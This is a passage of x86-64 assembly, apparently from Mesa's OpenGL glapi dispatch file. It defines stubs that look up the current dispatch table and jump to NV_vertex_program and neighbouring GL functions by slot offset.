#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5216(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	5216(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5216(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	5216(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(_dispatch_stub_652), .-GL_PREFIX(_dispatch_stub_652)

	/* stub 653: slot 653 (5224); three integer args */
	.p2align	4,,15
	.globl GL_PREFIX(_dispatch_stub_653)
	.type GL_PREFIX(_dispatch_stub_653), @function
	HIDDEN(GL_PREFIX(_dispatch_stub_653))
GL_PREFIX(_dispatch_stub_653):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5224(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5224(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5224(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5224(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(_dispatch_stub_653), .-GL_PREFIX(_dispatch_stub_653)

	/* stub 654: slot 654 (5232); single arg in %rdi */
	.p2align	4,,15
	.globl GL_PREFIX(_dispatch_stub_654)
	.type GL_PREFIX(_dispatch_stub_654), @function
	HIDDEN(GL_PREFIX(_dispatch_stub_654))
GL_PREFIX(_dispatch_stub_654):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5232(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	5232(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5232(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	5232(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(_dispatch_stub_654), .-GL_PREFIX(_dispatch_stub_654)

	/* stub 655: slot 655 (5240); two integer args + %rbp pad */
	.p2align	4,,15
	.globl GL_PREFIX(_dispatch_stub_655)
	.type GL_PREFIX(_dispatch_stub_655), @function
	HIDDEN(GL_PREFIX(_dispatch_stub_655))
GL_PREFIX(_dispatch_stub_655):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5240(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	5240(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5240(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	5240(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(_dispatch_stub_655), .-GL_PREFIX(_dispatch_stub_655)

	/* stub 656: slot 656 (5248); single arg in %rdi */
	.p2align	4,,15
	.globl GL_PREFIX(_dispatch_stub_656)
	.type GL_PREFIX(_dispatch_stub_656), @function
	HIDDEN(GL_PREFIX(_dispatch_stub_656))
GL_PREFIX(_dispatch_stub_656):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5248(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	5248(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5248(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	5248(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(_dispatch_stub_656), .-GL_PREFIX(_dispatch_stub_656)
	/*
	 * NV_vertex_program entry points, dispatch slots 657-665.  Standard
	 * glapi stub pattern: fetch dispatch table into %rax, tail-jump through
	 * the pointer at slot*8, preserving live argument registers around the
	 * table lookup where the lookup is itself a function call.
	 */
	/* glAreProgramsResidentNV: slot 657 (657*8 = 5256); three args */
	.p2align	4,,15
	.globl GL_PREFIX(AreProgramsResidentNV)
	.type GL_PREFIX(AreProgramsResidentNV), @function
GL_PREFIX(AreProgramsResidentNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5256(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5256(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5256(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5256(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(AreProgramsResidentNV), .-GL_PREFIX(AreProgramsResidentNV)

	/* glBindProgramNV: slot 658 (5264); two args + %rbp alignment pad */
	.p2align	4,,15
	.globl GL_PREFIX(BindProgramNV)
	.type GL_PREFIX(BindProgramNV), @function
GL_PREFIX(BindProgramNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5264(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	5264(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5264(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	5264(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(BindProgramNV), .-GL_PREFIX(BindProgramNV)

	/* glDeleteProgramsNV: slot 659 (5272); two args + %rbp pad */
	.p2align	4,,15
	.globl GL_PREFIX(DeleteProgramsNV)
	.type GL_PREFIX(DeleteProgramsNV), @function
GL_PREFIX(DeleteProgramsNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5272(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	5272(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5272(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	5272(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(DeleteProgramsNV), .-GL_PREFIX(DeleteProgramsNV)

	/* glExecuteProgramNV: slot 660 (5280); three args */
	.p2align	4,,15
	.globl GL_PREFIX(ExecuteProgramNV)
	.type GL_PREFIX(ExecuteProgramNV), @function
GL_PREFIX(ExecuteProgramNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5280(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5280(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5280(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5280(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(ExecuteProgramNV), .-GL_PREFIX(ExecuteProgramNV)

	/* glGenProgramsNV: slot 661 (5288); two args + %rbp pad */
	.p2align	4,,15
	.globl GL_PREFIX(GenProgramsNV)
	.type GL_PREFIX(GenProgramsNV), @function
GL_PREFIX(GenProgramsNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5288(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	5288(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5288(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	5288(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GenProgramsNV), .-GL_PREFIX(GenProgramsNV)

	/* glGetProgramParameterdvNV: slot 662 (5296); four args + %rbp pad */
	.p2align	4,,15
	.globl GL_PREFIX(GetProgramParameterdvNV)
	.type GL_PREFIX(GetProgramParameterdvNV), @function
GL_PREFIX(GetProgramParameterdvNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5296(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5296(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5296(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5296(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetProgramParameterdvNV), .-GL_PREFIX(GetProgramParameterdvNV)

	/* glGetProgramParameterfvNV: slot 663 (5304); four args + %rbp pad */
	.p2align	4,,15
	.globl GL_PREFIX(GetProgramParameterfvNV)
	.type GL_PREFIX(GetProgramParameterfvNV), @function
GL_PREFIX(GetProgramParameterfvNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5304(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5304(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5304(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5304(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetProgramParameterfvNV), .-GL_PREFIX(GetProgramParameterfvNV)

	/* glGetProgramStringNV: slot 664 (5312); three args */
	.p2align	4,,15
	.globl GL_PREFIX(GetProgramStringNV)
	.type GL_PREFIX(GetProgramStringNV), @function
GL_PREFIX(GetProgramStringNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5312(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5312(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5312(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5312(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetProgramStringNV), .-GL_PREFIX(GetProgramStringNV)

	/* glGetProgramivNV: slot 665 (5320); three args */
	.p2align	4,,15
	.globl GL_PREFIX(GetProgramivNV)
	.type GL_PREFIX(GetProgramivNV), @function
GL_PREFIX(GetProgramivNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5320(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5320(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5320(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5320(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetProgramivNV), .-GL_PREFIX(GetProgramivNV)
	/*
	 * NV_vertex_program query entry points, dispatch slots 666-671.
	 * Standard glapi stub pattern: load the dispatch table into %rax and
	 * tail-jump through the function pointer at slot*8, saving/restoring
	 * the live argument registers around the table-fetch call (the %rbp
	 * push, where present, is only stack-alignment padding).
	 */
	/* glGetTrackMatrixivNV: slot 666 (666*8 = 5328); four args + pad */
	.p2align	4,,15
	.globl GL_PREFIX(GetTrackMatrixivNV)
	.type GL_PREFIX(GetTrackMatrixivNV), @function
GL_PREFIX(GetTrackMatrixivNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5328(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5328(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5328(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5328(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetTrackMatrixivNV), .-GL_PREFIX(GetTrackMatrixivNV)

	/* glGetVertexAttribPointervNV: slot 667 (5336); three args */
	.p2align	4,,15
	.globl GL_PREFIX(GetVertexAttribPointervNV)
	.type GL_PREFIX(GetVertexAttribPointervNV), @function
GL_PREFIX(GetVertexAttribPointervNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5336(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5336(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5336(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5336(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetVertexAttribPointervNV), .-GL_PREFIX(GetVertexAttribPointervNV)

	/* glGetVertexAttribdvNV: slot 668 (5344); three args */
	.p2align	4,,15
	.globl GL_PREFIX(GetVertexAttribdvNV)
	.type GL_PREFIX(GetVertexAttribdvNV), @function
GL_PREFIX(GetVertexAttribdvNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5344(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5344(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5344(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5344(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetVertexAttribdvNV), .-GL_PREFIX(GetVertexAttribdvNV)

	/* glGetVertexAttribfvNV: slot 669 (5352); three args */
	.p2align	4,,15
	.globl GL_PREFIX(GetVertexAttribfvNV)
	.type GL_PREFIX(GetVertexAttribfvNV), @function
GL_PREFIX(GetVertexAttribfvNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5352(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5352(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5352(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5352(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetVertexAttribfvNV), .-GL_PREFIX(GetVertexAttribfvNV)

	/* glGetVertexAttribivNV: slot 670 (5360); three args */
	.p2align	4,,15
	.globl GL_PREFIX(GetVertexAttribivNV)
	.type GL_PREFIX(GetVertexAttribivNV), @function
GL_PREFIX(GetVertexAttribivNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5360(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5360(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5360(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5360(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetVertexAttribivNV), .-GL_PREFIX(GetVertexAttribivNV)

	/* glIsProgramNV: slot 671 (5368); single arg in %rdi */
	.p2align	4,,15
	.globl GL_PREFIX(IsProgramNV)
	.type GL_PREFIX(IsProgramNV), @function
GL_PREFIX(IsProgramNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5368(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	5368(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5368(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	5368(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(IsProgramNV), .-GL_PREFIX(IsProgramNV)
	/*
	 * NV_vertex_program program/parameter entry points, slots 672-676.
	 * Standard glapi stub pattern: load dispatch table into %rax, tail-jump
	 * through slot*8; argument registers are preserved around the lookup
	 * call, with a %rbp push as 16-byte stack-alignment padding.
	 */
	/* glLoadProgramNV: slot 672 (672*8 = 5376); four args + %rbp pad */
	.p2align	4,,15
	.globl GL_PREFIX(LoadProgramNV)
	.type GL_PREFIX(LoadProgramNV), @function
GL_PREFIX(LoadProgramNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5376(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5376(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5376(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5376(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(LoadProgramNV), .-GL_PREFIX(LoadProgramNV)

	/* glProgramParameters4dvNV: slot 673 (5384); four args + %rbp pad */
	.p2align	4,,15
	.globl GL_PREFIX(ProgramParameters4dvNV)
	.type GL_PREFIX(ProgramParameters4dvNV), @function
GL_PREFIX(ProgramParameters4dvNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5384(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5384(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5384(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5384(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(ProgramParameters4dvNV), .-GL_PREFIX(ProgramParameters4dvNV)

	/* glProgramParameters4fvNV: slot 674 (5392); four args + %rbp pad */
	.p2align	4,,15
	.globl GL_PREFIX(ProgramParameters4fvNV)
	.type GL_PREFIX(ProgramParameters4fvNV), @function
GL_PREFIX(ProgramParameters4fvNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5392(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5392(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5392(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5392(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(ProgramParameters4fvNV), .-GL_PREFIX(ProgramParameters4fvNV)

	/* glRequestResidentProgramsNV: slot 675 (5400); two args + %rbp pad */
	.p2align	4,,15
	.globl GL_PREFIX(RequestResidentProgramsNV)
	.type GL_PREFIX(RequestResidentProgramsNV), @function
GL_PREFIX(RequestResidentProgramsNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5400(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	5400(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5400(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	5400(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(RequestResidentProgramsNV), .-GL_PREFIX(RequestResidentProgramsNV)

	/* glTrackMatrixNV: slot 676 (5408); four args + %rbp pad */
	.p2align	4,,15
	.globl GL_PREFIX(TrackMatrixNV)
	.type GL_PREFIX(TrackMatrixNV), @function
GL_PREFIX(TrackMatrixNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	5408(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5408(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	5408(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	5408(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(TrackMatrixNV), .-GL_PREFIX(TrackMatrixNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib1dNV)
.type GL_PREFIX(VertexAttrib1dNV), @function
GL_PREFIX(VertexAttrib1dNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5416(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 5416(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5416(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 5416(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib1dNV), .-GL_PREFIX(VertexAttrib1dNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib1dvNV)
.type GL_PREFIX(VertexAttrib1dvNV), @function
GL_PREFIX(VertexAttrib1dvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5424(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5424(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5424(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5424(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib1dvNV), .-GL_PREFIX(VertexAttrib1dvNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib1fNV)
.type GL_PREFIX(VertexAttrib1fNV), @function
